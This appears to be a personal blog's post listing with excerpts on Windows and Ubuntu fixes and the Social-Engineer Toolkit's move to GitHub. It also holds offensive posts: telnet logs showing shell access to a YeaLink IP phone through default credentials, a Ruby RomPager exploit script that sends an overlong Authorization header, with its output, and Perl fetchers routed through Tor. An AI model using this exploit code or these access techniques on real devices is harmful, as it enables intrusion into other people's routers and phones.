Posts

IPRIP unable to create socket for address (Solution)

Click Start , and then click Run In the Open box type CMD In CMD type NET USE Damn..I hate windows..but need to use at 1st for the time being.. :P

SET Dont use SVN Anymore and move to GITHUB

Below is the step taken :- ==== STEP 1==== [-] New set_config.py file generated on: 2013-01-04 10:54:25.898164 [-] Verifying configuration update... [*] Update verified, config timestamp is: 2013-01-04 10:54:25.898164 [*] SET is using the new config, no need to restart [!] The Social-Engineer Toolkit has officially moved to github and no longer uses SVN. [!] Ensure that you have GIT installed and this conversion tool will automatically pull the latest git version for you. [!] Do you want to do a manual install or have SET do the conversion to GIT for you? 1. Automatic 2. Manual 3. Continue using SET (NO UPDATES ANYMORE!) Enter your numeric choice: 1 [*] BEFORE YOU START! Ensure you have GIT installed (apt-get install git) Have you installed GIT? y/n: y [*] Great! Here we go... Removing old svn repository and moving to new [*] SET directory has been removed. Now checking out SET from GIT.. [*] This could take a few moments.. Cloning into /opt/set... remote: Coun...

YeaLink IP Phone SIP CSRF / Default Credentials

:~# telnet 10.10.1.136 Trying 10.10.1.136... telnet: Unable to connect to remote host: Connection refused :~# CSRF Code :~# telnet 10.10.1.136 Trying 10.10.1.136... Connected to 10.10.1.136. Escape character is '^]'. IPPHONE login: Password: BusyBox v1.6.1 (2010-10-08 16:43:22 CST) Built-in shell (ash) Enter 'help' for a list of built-in commands. $

Skype Webcam Fail on Ubuntu (Solution)

Just for my record only. Need to install both :- libv4l-0 - Collection of video4linux support libraries libv4l-dev - Collection of video4linux support libraries (development files) #apt-get install libv4l-0 #apt-get install libv4l-dev ===EOF===

RomPager Exploit.

# ./get.pl -n 17x.x.x.x [+] GET Http By Pretorians [!] Target: 17x.x.x.x Connecting to 17x.x.x.x HTTP/1.1 404 Not Found Content-Type: text/html Server: RomPager/4.07 UPnP/1.0 #ruby rugbi.rb End Result =========== ./get.pl -n 17x.x.x.x [+] GET Http By Pretorians [!] Target: 17x.x.x.x |!| Can not connect... ===EOF=== Code -------- require 'net/https' url = URI.parse("http://17x.x.x.x/") data = nil headers = {   "Host" => "IP",   "Authorization" => "Basic AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$ } res = Net::HTTP.start(url.host, url.port) do |http|   http.use_ssl = false   http.send_request("GET", url.path, data, headers) end puts res.body

GET HTTP(Proxy / IO:Socket / HTML::LinkExtor)

Latest update was HTML::LinkExtor as below. #!/usr/bin/perl ############################################ #           [+]  Get HTTP #       Created #              BY #                Pretorians # ########################################### use LWP::Simple; use Time::localtime; use LWP::UserAgent; use  IO::Socket; use HTML::LinkExtor; ## print "[+] GET Http By Pretorians \n"; ## ## if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); if ($type eq "-p") { print "[!] Target: $t\n"; my $ua = LWP::UserAgent->new;      $ua->agent('Mozilla/5.0 ');        $ua->proxy([(http )] => 'socks://127.0.0.1:9050');         $ua->cookie_jar({}...

GET HTTP (Proxy or using IO::Socket)

#!/usr/bin/perl ############################################ #           [+]  Get HTTP #       Created #              BY #                Pretorians # ########################################### use LWP::Simple; use Time::localtime; use LWP::UserAgent; use  IO::Socket; ## print "[+] GET Http \n"; ## ## if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); if ($type eq "-p") { print "[!] Target: $t\n"; my $ua = LWP::UserAgent->new;      $ua->agent('Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0');        $ua->proxy([(http )] => 'socks://127.0.0.1:9050');         $ua->cookie_...